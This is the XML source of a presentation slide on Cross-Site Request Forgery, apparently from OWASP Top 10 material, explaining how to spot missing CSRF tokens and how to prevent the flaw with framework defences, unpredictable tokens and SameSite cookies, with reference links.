                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests.  An alternate defense is to require the user to prove they intended to submit the request, such as through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server-Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CSRF Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool can help generate test cases to demonstrate the dangers of CSRF flaws.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>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4"/>
              </a:rPr>
              <a:t>OWASP CSRF Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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7"/>
              </a:rPr>
              <a:t>OWASP CSRF Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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8"/>
              </a:rPr>
              <a:t>OWASP CSRFGuard - Java CSRF Defense Tool </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CSRFProtector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> PHP and Apache CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Defense Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="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10"/>
              </a:rPr>
              <a:t>ESAPI HTTPUtilities Class with AntiCSRF Tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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11"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on CSRF Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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5"/>
              </a:rPr>
              <a:t>OWASP CSRFTester - CSRF Testing Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>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12"/>
              </a:rPr>
              <a:t>CWE Entry 352 on CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Wikipedia article </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>on CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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How Do I Prevent CSRF?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preferred option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is to use an existing CSRF defense. Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frameworks now include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>built in CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defenses, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Some web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>development languages, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do so as well. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>CSRF Guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can automatically add CSRF defenses to Java apps. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CSRFProtector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>does the same for PHP or as an Apache filter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Otherwise, preventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the unique token in a hidden field. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>includes the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in the body of the HTTP request, avoiding its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exposure in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The unique token can also be included in the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or a parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this runs the risk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the token will be exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=strict” flag on all cookies, which is increasingly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>supported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in browsers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
